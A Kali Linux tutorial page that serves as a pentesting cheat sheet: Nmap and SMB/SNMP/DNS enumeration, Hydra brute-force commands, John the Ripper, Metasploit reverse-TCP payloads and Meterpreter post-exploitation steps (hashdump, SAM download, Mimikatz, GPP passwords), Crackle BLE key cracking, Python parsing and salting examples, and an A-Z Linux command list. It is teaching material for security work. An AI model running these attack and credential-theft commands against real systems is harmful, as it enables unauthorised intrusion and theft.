Kali linux tutorials

Pub Date: 2023-07-31

NMAP Commands

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.


Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

  • nmap -v -sS -A -T4 target – Nmap verbose scan: SYN stealth scan, T4 timing (should be OK on a LAN), OS and service version detection, traceroute and default scripts against discovered services
  • nmap -v -sS -p- -A -T4 target – As above, but scans all 65535 TCP ports (takes a lot longer)
  • nmap -v -sU -sS -p- -A -T4 target – As above, but adds a UDP scan (takes even longer)
  • nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X – Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may crash the target service. On current Nmap releases this script has been replaced by the smb-vuln-* scripts.
  • ls /usr/share/nmap/scripts/ | grep ftp- – Search the Nmap scripts directory for a keyword (here: ftp)

SMB enumeration

In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network

  • nbtscan 192.168.1.0/24 – Discover Windows / Samba servers on the subnet: finds Windows MAC addresses, NetBIOS names and the client workgroup / domain
  • enum4linux -a target-ip – Do everything: runs all options (finds the Windows client domain / workgroup) apart from dictionary-based share name guessing

Other Host Discovery

Other methods of host discovery that don't use Nmap.

  • netdiscover -r 192.168.1.0/24 – Discovers IP, MAC address and MAC vendor on the subnet via ARP; helpful for confirming you're on the right VLAN at a client site

Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.

  • python -m SimpleHTTPServer 80 – Run a basic HTTP server serving the current directory (Python 2; on Python 3, which current Kali ships, the equivalent is python3 -m http.server 80)

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

  • mount 192.168.1.1:/vol/share /mnt/nfs – Mount an NFS share at /mnt/nfs
  • mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs – Mount a Windows CIFS / SMB share on Linux at /mnt/cifs; if you leave out password= it prompts on the CLI (more secure, as the password won't end up in bash_history), or keep the credentials in a mode-600 file and pass -o credentials=/path/to/file instead
  • net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no – Mount a Windows share on Windows from the command line
  • apt-get install smb4k -y – Install smb4k on Kali, a useful Linux GUI for browsing SMB shares

Basic FingerPrinting

A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.

  • nc -v 192.168.1.1 25 – Basic versioning / fingerprinting via the displayed banner
  • telnet 192.168.1.1 25 – As above, using telnet

SNMP Enumeration

SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.

  • snmpcheck -t 192.168.1.X -c public – Enumerate the device over SNMP using the public community string (Kali packages this as snmp-check, which takes the target as a positional argument: snmp-check -c public 192.168.1.X)
  • snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d" " -f4 – Walk the MIB and list the names of running processes (hrSWRunName)
  • snmpenum -t 192.168.1.X – SNMP enumeration
  • onesixtyone -c names -i hosts – Try the community strings in the file names against the hosts listed in the file hosts

DNS Zone Transfers

  • nslookup -> set type=any -> ls -d blah.com – Windows DNS zone transfer
  • dig axfr blah.com @ns1.blah.com – Linux DNS zone transfer

DNSRecon

DNSRecon provides the ability to perform:

  1. Check all NS records for zone transfers
  2. Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
  3. Perform common SRV record enumeration
  4. Top Level Domain (TLD) expansion
  5. Check for wildcard resolution
  6. Brute force subdomain and host A and AAAA records given a domain and a wordlist
  7. Perform a PTR record lookup for a given IP range or CIDR
  8. Check a DNS server's cached records for A, AAAA and CNAME records, given a list of host records in a text file to check
  9. Enumerate common mDNS records in the local network
  10. Enumerate hosts and subdomains using Google

DNS enumeration on Kali with DNSRecon:

root@kali:~# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml

HTTP / HTTPS Webserver Enumeration

  • nikto -h 192.168.1.1 – Perform a Nikto scan against the target
  • dirbuster – Configure via the GUI; CLI input doesn't work most of the time

Packet Inspection

  • tcpdump -i eth0 -w output.pcap tcp port 80 – tcpdump for port 80 on interface eth0, writing the capture to output.pcap (options go before the filter expression)
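The file tcpdump writes with -w is in libpcap format, which is simple enough to read without Wireshark when you want to check what a capture contains. The following is an added example, not code from the original page: it builds a small pcap image from constructed Ethernet/IPv4/TCP frames (no real traffic), parses the global header and the per-record headers, walks the Ethernet and IP headers to the TCP ports, and applies the same "tcp port 80" selection after the fact. The function names, sample addresses and timestamps are the example's own assumptions.

```python
import socket
import struct

# libpcap file format as written by "tcpdump -w": a 24-byte global header,
# then a 16-byte record header in front of every captured frame.
PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6


def build_tcp_frame(src_ip, dst_ip, sport, dport):
    """Constructed Ethernet + IPv4 + TCP SYN frame (checksums left at zero)."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + struct.pack("!H", ETHERTYPE_IPV4)
    # version/IHL, TOS, total length, id, flags/fragment, TTL, protocol, checksum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    # sport, dport, seq, ack, data offset (5 words), flags (SYN), window, checksum, urgent
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, 0x02, 65535, 0, 0)
    return eth + ip + tcp


def build_pcap(frames):
    """Serialize frames into a little-endian pcap file image (what tcpdump -w produces on x86)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        # ts_sec, ts_usec, captured length, original length
        out += struct.pack("<IIII", 1690800000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_records(data):
    """Yield (timestamp, frame_bytes) for each record in a classic pcap image."""
    (magic,) = struct.unpack("<I", data[:4])
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:  # file written on a big-endian host
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype = struct.unpack(endian + "HHiIII", data[4:24])[5]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield ts_sec, data[off:off + incl_len]
        off += incl_len


def tcp_packets(data):
    """Yield (ts, src_ip, sport, dst_ip, dport) for every IPv4/TCP frame in the capture."""
    for ts, frame in iter_records(data):
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue  # too short, or not IPv4 (e.g. ARP)
        ihl = (frame[14] & 0x0F) * 4  # IP header length in bytes
        if frame[23] != IPPROTO_TCP:
            continue
        tcp = frame[14 + ihl:]
        if len(tcp) < 4:
            continue
        sport, dport = struct.unpack("!HH", tcp[:4])
        yield ts, socket.inet_ntoa(frame[26:30]), sport, socket.inet_ntoa(frame[30:34]), dport


def packets_on_port(data, port):
    """The 'tcp port N' capture filter, applied to an existing file."""
    return [p for p in tcp_packets(data) if port in (p[2], p[4])]


# Constructed sample capture: three TCP frames plus one ARP frame that must be skipped.
ARP_FRAME = b"\xff" * 6 + bytes.fromhex("66778899aabb") + struct.pack("!H", 0x0806) + b"\x00" * 28
SAMPLE_PCAP = build_pcap([
    build_tcp_frame("10.0.0.5", "203.0.113.10", 51000, 80),
    build_tcp_frame("203.0.113.10", "10.0.0.5", 80, 51000),
    build_tcp_frame("10.0.0.5", "203.0.113.10", 51001, 443),
    ARP_FRAME,
])

if __name__ == "__main__":
    for ts, src, sport, dst, dport in packets_on_port(SAMPLE_PCAP, 80):
        print(f"{ts} {src}:{sport} -> {dst}:{dport}")
```

Point iter_records at the bytes of a real output.pcap and the same functions work unchanged; a pcapng file (the default for Wireshark, not for tcpdump) starts with a different magic and is rejected rather than misparsed.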

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX – Enumerate users from SMB (current Kali installs the same script as impacket-samrdump)
  • ridenum.py 192.168.XXX.XXX 500 50000 dict.txt – RID cycling over SMB to enumerate users

SNMP User Enumeration

  • snmpwalk -c public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4 – Enumerate users from SNMP
  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX – Enumerate users from SNMP
  • nmap -sU -p 161 192.168.X.XXX/24 -oG snmp_results.txt – Search for SNMP servers with Nmap, grepable output (then grep the file). SNMP agents listen on UDP/161, so a TCP connect scan (-sT) would not find them.
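The -oG file above is meant to be grepped, but parsing it properly is more reliable than an ad hoc grep once a Ports field holds several entries or an open|filtered state. The following is an added example, not part of the original cheat sheet: a parser for Nmap's grepable format run over a constructed sample (no real hosts), which then lists the hosts that genuinely expose SNMP on UDP/161, the inventory a defender wants before checking for default community strings. It goes slightly beyond the page's single-port case by handling multi-port lines and the Ignored State field; the sample addresses, hostnames and function names are assumptions.

```python
import re

# Constructed sample in Nmap's grepable (-oG) format; not real scan output.
# Every "Host:" line carries tab-separated fields. The Ports field lists
# port/state/protocol/owner/service/rpc-info/version/ entries separated by ", ".
SAMPLE_GREPABLE = """\
# Nmap 7.94 scan initiated Mon Jul 31 10:00:00 2023 as: nmap -sU -p 161 -oG snmp_results.txt 192.168.1.0/24
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 161/open/udp//snmp///
Host: 192.168.1.11 ()\tStatus: Up
Host: 192.168.1.11 ()\tPorts: 161/closed/udp//snmp///
Host: 192.168.1.12 (printer.lan)\tPorts: 161/open|filtered/udp//snmp///
Host: 192.168.1.13 (switch.lan)\tPorts: 22/open/tcp//ssh//OpenSSH 8.9/, 161/open/udp//snmp///\tIgnored State: closed (1)
# Nmap done at Mon Jul 31 10:00:12 2023 -- 256 IP addresses (4 hosts up) scanned in 12.34 seconds
"""

HOST_RE = re.compile(r"Host:\s+(\S+)\s+\((.*?)\)")


def parse_grepable(text):
    """Return {ip: {"hostname": str, "ports": [(port, proto, state, service), ...]}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # "# Nmap ..." comment and summary lines
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        entry = hosts.setdefault(ip, {"hostname": hostname, "ports": []})
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue  # Status:, Ignored State:, OS: and similar fields
            for item in field[len("Ports:"):].split(","):
                parts = item.strip().split("/")
                if len(parts) < 5 or not parts[0].isdigit():
                    continue
                # parts: port, state, protocol, owner, service, rpc-info, version
                entry["ports"].append((int(parts[0]), parts[2], parts[1], parts[4]))
    return hosts


def hosts_with_open_port(hosts, port, proto):
    """IPs where Nmap reports the port as definitely open; 'open|filtered' is excluded."""
    return sorted(
        ip for ip, h in hosts.items()
        if any(p == port and pr == proto and st == "open" for p, pr, st, _ in h["ports"])
    )


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_GREPABLE)
    for ip in hosts_with_open_port(scan, 161, "udp"):
        print(f"{ip} ({scan[ip]['hostname'] or 'no name'}) answers on UDP/161")
```

For UDP services Nmap reports open|filtered whenever nothing answers, so that state is listed but not treated as confirmed; only hosts that actually responded on 161 make the list.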

Passwords

Wordlists

  • /usr/share/wordlists – Linux word lists

Brute Forcing Services

Hydra FTP Brute Force

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the Synaptic package manager. On Kali Linux it is pre-installed.

  • hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V – Hydra FTP brute force

Hydra POP3 Brute Force

  • hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V – Hydra POP3 brute force

Hydra SMTP Brute Force

  • hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX smtp -V – Hydra SMTP brute force (Hydra needs a login via -l or -L for every service). Use -t to limit concurrent connections, for example -t 15.

Password Cracking

John The Ripper – JTR

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations against a service daemon such as an FTP or Telnet server. John, however, needs the hash first, so the greater challenge for a hacker is to first obtain the hash that is to be cracked.

Nowadays hashes are often easily crackable using free rainbow-table lookup sites online: submit the hash and, if it is the hash of a common word, the site shows the word almost instantly. Such sites store common words and their hashes in a large database; the larger the database, the more words it covers. This only works for unsalted hashes: a per-user salt changes the digest, so a precomputed table no longer matches.

  • john --wordlist=/usr/share/wordlists/rockyou.txt hashes – JTR password cracking with a wordlist
  • john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt – JTR forced descrypt cracking with a wordlist
  • john --format=descrypt hash – JTR forced descrypt brute-force (incremental mode) cracking; john --format=descrypt --show hash then prints the cracked results
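To show why the rainbow-table lookup described above works, and what stops it, here is an added example (not code from the page or from John the Ripper): a toy wordlist stands in for rockyou.txt, a precomputed digest table gives instant reversal of an unsalted MD5, and the same password stored with PBKDF2 and a random salt yields a different digest for every user, so no precomputed table matches. The wordlist contents, function names and iteration count are the example's own assumptions.

```python
import hashlib
import hmac
import os

# Constructed toy wordlist standing in for /usr/share/wordlists/rockyou.txt.
WORDLIST = ["password", "letmein", "summer2023", "correct horse battery staple", "Tr0ub4dor&3"]
PBKDF2_ITERATIONS = 100_000  # assumed cost setting; real deployments tune this upward


def unsalted_hash(word, algo="md5"):
    """Plain digest of the password, the form a rainbow table can reverse."""
    return hashlib.new(algo, word.encode()).hexdigest()


def build_lookup_table(words, algo="md5"):
    """Precompute digest -> word, which is what a rainbow-table site does for unsalted hashes."""
    return {unsalted_hash(w, algo): w for w in words}


def lookup(table, digest):
    """Instant reverse lookup; None when the hash is not of a listed word."""
    return table.get(digest.strip().lower())


def salted_hash(password, salt, iterations=PBKDF2_ITERATIONS):
    """Salted, iterated hash (PBKDF2-HMAC-SHA256): the salt defeats precomputation,
    the iteration count makes every guess expensive."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()


def verify_salted(password, salt, stored, iterations=PBKDF2_ITERATIONS):
    """Constant-time comparison of a candidate password against a stored salted hash."""
    return hmac.compare_digest(salted_hash(password, salt, iterations), stored)


def same_password_different_digests(password):
    """Two users with the same password end up with different stored hashes once salts differ,
    so a table built for one is useless for the other."""
    salt_a, salt_b = os.urandom(16), os.urandom(16)
    return salted_hash(password, salt_a) != salted_hash(password, salt_b)


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    target = unsalted_hash("letmein")  # constructed "leaked" unsalted hash
    print(f"{target} -> {lookup(table, target)}")  # found instantly
    salt = os.urandom(16)
    stored = salted_hash("letmein", salt)
    print(f"salted: {stored} in table? {lookup(table, stored) is not None}")
    print("salts differ per user:", same_password_different_digests("letmein"))
```

The lookup side is exactly why an unsalted MD5 or SHA-1 of a common password is effectively plaintext; the salted side is the defence, and John can still attack it, only at the cost of one full PBKDF2 computation per guess per user.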


Meterpreter Payloads

  • set payload windows/meterpreter/reverse_tcp – Windows reverse TCP Meterpreter payload
  • set payload windows/vncinject/reverse_tcp followed by set ViewOnly false – Windows VNC inject reverse TCP payload
  • set payload linux/meterpreter/reverse_tcp – Linux reverse TCP Meterpreter payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

  • upload file c:\windows – Meterpreter upload a file to the Windows target
  • download c:\windows\repair\sam /tmp – Meterpreter download a file from the Windows target
  • execute -f c:\windows\temp\exploit.exe – Meterpreter run an .exe on the target, handy for executing uploaded exploits
  • execute -f cmd -c – Creates a new channel with a cmd shell
  • ps – Meterpreter show processes
  • shell – Meterpreter get a shell on the target
  • getsystem – Meterpreter attempts privilege escalation on the target
  • hashdump – Meterpreter attempts to dump the password hashes on the target
  • portfwd add -l 3389 -p 3389 -r target – Meterpreter create a port forward to the target machine
  • portfwd delete -l 3389 -p 3389 -r target – Meterpreter delete the port forward

Common Metasploit Modules

Local Windows Metasploit Modules (exploits)

  • use exploit/windows/local/bypassuac – Bypass UAC on Windows 7+; set target and arch (x86/x64)

Auxiliary Metasploit Modules

  • use auxiliary/scanner/http/dir_scanner – Metasploit HTTP directory scanner
  • use auxiliary/scanner/http/jboss_vulnscan – Metasploit JBoss vulnerability scanner
  • use auxiliary/scanner/mssql/mssql_login – Metasploit MSSQL credential scanner
  • use auxiliary/scanner/mysql/mysql_version – Metasploit MySQL version scanner
  • use auxiliary/scanner/oracle/oracle_login – Metasploit Oracle login module

Metasploit PowerShell Modules

  • use exploit/multi/script/web_delivery – Metasploit PowerShell payload delivery module
  • use post/windows/manage/powershell/exec_powershell – Metasploit upload and run a PowerShell script through a session
  • use exploit/multi/http/jboss_maindeployer – Metasploit JBoss deploy
  • use exploit/windows/mssql/mssql_payload – Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

  • run post/windows/gather/win_privs – Metasploit show privileges of the current user
  • use post/windows/gather/credentials/gpp – Metasploit grab GPP saved passwords
  • load mimikatz -> wdigest – Metasploit load Mimikatz (in current Metasploit the extension is called kiwi)
  • run post/windows/gather/local_admin_search_enum – Identify other machines on which the supplied domain user has administrative access

Amap

The first next-generation scanning tool for pentesters. It attempts to identify applications even if they are running on a different port than normal.

It also identifies non-ascii based applications. This is achieved by sending trigger packets, and looking up the responses in a list of response strings.

root@kali:~# amap -bqv 192.168.1.15 80
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

amap v5.4 (www.thc.org/thc-amap) started at 2014-05-13 19:07:16 - APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23

Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http - banner: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>501 Method Not Implemented</title>\n</head><body>\n<h1>Method Not Implemented</h1>\n<p> to /index.html not supported.<br />\n</p>\n<hr>\n<address>Apache/2.2.22 (Debian) Server at 12
Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http-apache-2 - banner: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>501 Method Not Implemented</title>\n</head><body>\n<h1>Method Not Implemented</h1>\n<p> to /index.html not supported.<br />\n</p>\n<hr>\n<address>Apache/2.2.22 (Debian) Server at 12
Waiting for timeout on 19 connections …

amap v5.4 finished at 2014-05-13 19:07:22

Maltego

Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.

root@kali:~# cat /opt/Teeth/README.txt
NB NB: This runs on Kali Linux
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#Make directory /opt/Teeth/
#Copy tgz to /opt/Teeth/
#Untar

Load the config file called /opt/Teeth/etc/Maltego_config.mtz file into Maltego.

This is painless:

  1. Open Maltego Tungsten (or Radium)
  2. Click top left globe/sphere (Application button)
  3. Import -> Import configuration, choose /opt/Teeth/etc/Maltego_config.mtz

Notes
-----
Config file is in /opt/Teeth/etc/TeethConfig.txt. Everything can be set in the config file.

Log file is /var/log/Teeth.log; tail -f it while you are running transforms for real-time logs of what's happening.

You can set DEBUG/INFO. DEBUG is useful for seeing progress; set it in /opt/Teeth/units/TeethLib.py line 26.

Look in the cache/ directory. Here you find caches of:

  1. Nmap results
  2. Mirrors
  3. SQLMAP results

You need to remove cache files by hand if you no longer want them. You can run housekeep/clear_cache.sh but it removes EVERYTHING.

The WP brute transform uses Metasploit. Start the Metasploit server so:

msfconsole -r /opt/Teeth/static/Teeth-MSF.rc

It takes a while to start, so be patient.

In /housekeep is killswitch.sh; it's the same as killing all python.


Crackle

Crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.

With the STK and LTK, all communications between the master and the slave can be decrypted.

root@kali:~# crackle -i ltk_exchange.pcap -o ltk-decrypted.pcap

!!! TK found: 000000 ding ding ding, using a TK of 0! Just Cracks(tm) !!!

Warning: packet is too short to be encrypted (1), skipping
LTK found: 7f62c053f104a5bbe68b1d896a2ed49c
Done, processed 712 total packets, decrypted 3

A-Z LINUX COMMANDS

a

  • apropos : Search Help manual pages (man -k)
  • apt-get : Search for and install software packages (Debian)
  • aptitude : Search for and install software packages (Debian)
  • aspell : Spell Checker
  • awk : Find and Replace text, database sort/validate/index

b

  • basename : Strip directory and suffix from filenames
  • bash : GNU Bourne-Again SHell
  • bc : Arbitrary precision calculator language
  • bg : Send to background
  • break : Exit from a loop
  • builtin : Run a shell builtin
  • bzip2 : Compress or decompress named file(s)

c

  • cal : Display a calendar
  • case : Conditionally perform a command
  • cat : Concatenate and print (display) the content of files
  • cd : Change Directory
  • cfdisk : Partition table manipulator for Linux
  • chgrp : Change group ownership
  • chmod : Change access permissions
  • chown : Change file owner and group
  • chroot : Run a command with a different root directory
  • chkconfig : System services (runlevel)
  • cksum : Print CRC checksum and byte counts
  • clear : Clear terminal screen
  • cmp : Compare two files
  • comm : Compare two sorted files line by line
  • command : Run a command, ignoring shell functions
  • continue : Resume the next iteration of a loop
  • cp : Copy one or more files to another location
  • cron : Daemon to execute scheduled commands
  • crontab : Schedule a command to run at a later time
  • csplit : Split a file into context-determined pieces
  • cut : Divide a file into several parts

d

  • date : Display or change the date & time
  • dc : Desk Calculator
  • dd : Convert and copy a file, write disk headers, boot records
  • ddrescue : Data recovery tool
  • declare : Declare variables and give them attributes
  • df : Display free disk space
  • diff : Display the differences between two files
  • diff3 : Show differences among three files
  • dig : DNS lookup
  • dir : Briefly list directory contents
  • dircolors : Colour setup for `ls`
  • dirname : Convert a full pathname to just a path
  • dirs : Display list of remembered directories
  • dmesg : Print kernel & driver messages
  • du : Estimate file space usage

e

  • echo : Display message on screen
  • egrep : Search file(s) for lines that match an extended expression
  • eject : Eject removable media
  • enable : Enable and disable builtin shell commands
  • env : Environment variables
  • ethtool : Ethernet card settings
  • eval : Evaluate several commands/arguments
  • exec : Execute a command
  • exit : Exit the shell
  • expect : Automate arbitrary applications accessed over a terminal
  • expand : Convert tabs to spaces
  • export : Set an environment variable
  • expr : Evaluate expressions

f

  • false : Do nothing, unsuccessfully
  • fdformat : Low-level format a floppy disk
  • fdisk : Partition table manipulator for Linux
  • fg : Send job to foreground
  • fgrep : Search file(s) for lines that match a fixed string
  • file : Determine file type
  • find : Search for files that meet a desired criteria
  • fmt : Reformat paragraph text
  • fold : Wrap text to fit a specified width
  • for : Expand words, and execute commands
  • format : Format disks or tapes
  • free : Display memory usage
  • fsck : File system consistency check and repair
  • ftp : File Transfer Protocol
  • function : Define Function Macros
  • fuser : Identify/kill the process that is accessing a file

g

  • gawk : Find and Replace text within file(s)
  • getopts : Parse positional parameters
  • grep : Search file(s) for lines that match a given pattern
  • groupadd : Add a user security group
  • groupdel : Delete a group
  • groupmod : Modify a group
  • groups : Print group names a user is in
  • gzip : Compress or decompress named file(s)

h

  • hash : Remember the full pathname of a name argument
  • head : Output the first part of file(s)
  • help : Display help for a built-in command
  • history : Command History
  • hostname : Print or set system name

i

  • iconv : Convert the character set of a file
  • id : Print user and group id's
  • if : Conditionally perform a command
  • ifconfig : Configure a network interface
  • ifdown : Stop a network interface
  • ifup : Start a network interface
  • import : Capture an X server screen and save the image to file
  • install : Copy files and set attributes

j

  • jobs : List active jobs
  • join : Join lines on a common field

k

  • kill : Stop a process from running
  • killall : Kill processes by name

l

  • less : Display output one screen at a time
  • let : Perform arithmetic on shell variables
  • ln : Create a symbolic link to a file
  • local : Create variables
  • locate : Find files
  • logname : Print current login name
  • logout : Exit a login shell
  • look : Display lines beginning with a given string
  • lpc : Line printer control program
  • lpr : Off line print
  • lprint : Print a file
  • lprintd : Abort a print job
  • lprintq : List the print queue
  • lprm : Remove jobs from the print queue
  • ls : List information about file(s)
  • lsof : List open files

m

  • make : Recompile a group of programs
  • man : Help manual
  • mkdir : Create new folder(s)
  • mkfifo : Make FIFOs (named pipes)
  • mkisofs : Create an hybrid ISO9660/JOLIET/HFS filesystem
  • mknod : Make block or character special files
  • more : Display output one screen at a time
  • mount : Mount a file system
  • mtools : Manipulate MS-DOS files
  • mtr : Network diagnostics (traceroute/ping)
  • mv : Move or rename files or directories
  • mmv : Mass Move and rename (files)

n

  • netstat : Networking information
  • nice : Set the priority of a command or job
  • nl : Number lines and write files
  • nohup : Run a command immune to hangups
  • notify-send : Send desktop notifications
  • nslookup : Query Internet name servers interactively

o

  • open : Open a file in its default application
  • op : Operator access

p

  • passwd : Modify a user password
  • paste : Merge lines of files
  • pathchk : Check file name portability
  • ping : Test a network connection
  • pkill : Stop processes from running
  • popd : Restore the previous value of the current directory
  • pr : Prepare files for printing
  • printcap : Printer capability database
  • printenv : Print environment variables
  • printf : Format and print data
  • ps : Process status
  • pushd : Save and then change the current directory
  • pwd : Print Working Directory

q

  • quota : Display disk usage and limits
  • quotacheck : Scan a file system for disk usage
  • quotactl : Set disk quotas

r

  • ram : ram disk device
  • rcp : Copy files between two machines
  • read : Read a line from standard input
  • readarray : Read from stdin into an array variable
  • readonly : Mark variables/functions as readonly
  • reboot : Reboot the system
  • rename : Rename files
  • renice : Alter priority of running processes
  • remsync : Synchronize remote files via email
  • return : Exit a shell function
  • rev : Reverse lines of a file
  • rm : Remove files
  • rmdir : Remove folder(s)
  • rsync : Remote file copy (Synchronize file trees)

s

  • screen : Multiplex terminal, run remote shells via ssh
  • scp : Secure copy (remote file copy)
  • sdiff : Merge two files interactively
  • sed : Stream Editor
  • select : Accept keyboard input
  • seq : Print numeric sequences
  • set : Manipulate shell variables and functions
  • sftp : Secure File Transfer Program
  • shift : Shift positional parameters
  • shopt : Shell Options
  • shutdown : Shutdown or restart linux
  • sleep : Delay for a specified time
  • slocate : Find files
  • sort : Sort text files
  • source : Run commands from a file (`.`)
  • split : Split a file into fixed-size pieces
  • ssh : Secure Shell client (remote login program)
  • strace : Trace system calls and signals
  • su : Substitute user identity
  • sudo : Execute a command as another user
  • sum : Print a checksum for a file
  • suspend : Suspend execution of this shell
  • symlink : Make a new name for a file
  • sync : Synchronize data on disk with memory

t

  • tail : Output the last part of file
  • tar : Tape ARchiver
  • tee : Redirect output to multiple files
  • test : Evaluate a conditional expression
  • time : Measure Program running time
  • times : User and system times
  • touch : Change file timestamps
  • top : List processes running on the system
  • traceroute : Trace Route to Host
  • trap : Run a command when a signal is set (bourne)
  • tr : Translate, squeeze, and/or delete characters
  • true : Do nothing, successfully
  • tsort : Topological sort
  • tty : Print filename of terminal on stdin
  • type : Describe a command

u

  • ulimit : Limit user resources
  • umask : Users file creation mask
  • umount : Unmount a device
  • unalias : Remove an alias
  • uname : Print system information
  • unexpand : Convert spaces to tabs
  • uniq : Uniquify files
  • units : Convert units from one scale to another
  • unset : Remove variable or function names
  • unshar : Unpack shell archive scripts
  • until : Execute commands (until error)
  • uptime : Show uptime
  • useradd : Create new user account
  • userdel : Delete a user account
  • usermod : Modify user account
  • users : List users currently logged in
  • uuencode : Encode a binary file
  • uudecode : Decode a file created by uuencode

v

  • v : Verbosely list directory contents (`ls -l -b`)
  • vdir : Verbosely list directory contents (`ls -l -b`)
  • vi : Text Editor
  • vmstat : Report virtual memory statistics

w

  • wait : Wait for a process to complete
  • watch : Execute/display a program periodically
  • wc : Print byte, word, and line counts
  • whereis : Search the user's $path, man pages and source files for a program
  • which : Search the user's $path for a program file
  • while : Execute commands
  • who : Print all usernames currently logged in
  • whoami : Print the current user id and name (`id -un`)
  • wget : Retrieve web pages or files via HTTP, HTTPS or FTP
  • write : Send a message to another user

x

  • xargs : Execute utility, passing constructed argument list(s)
  • xdg-open : Open a file or URL in the user's preferred application

y

  • yes : Print a string until interrupted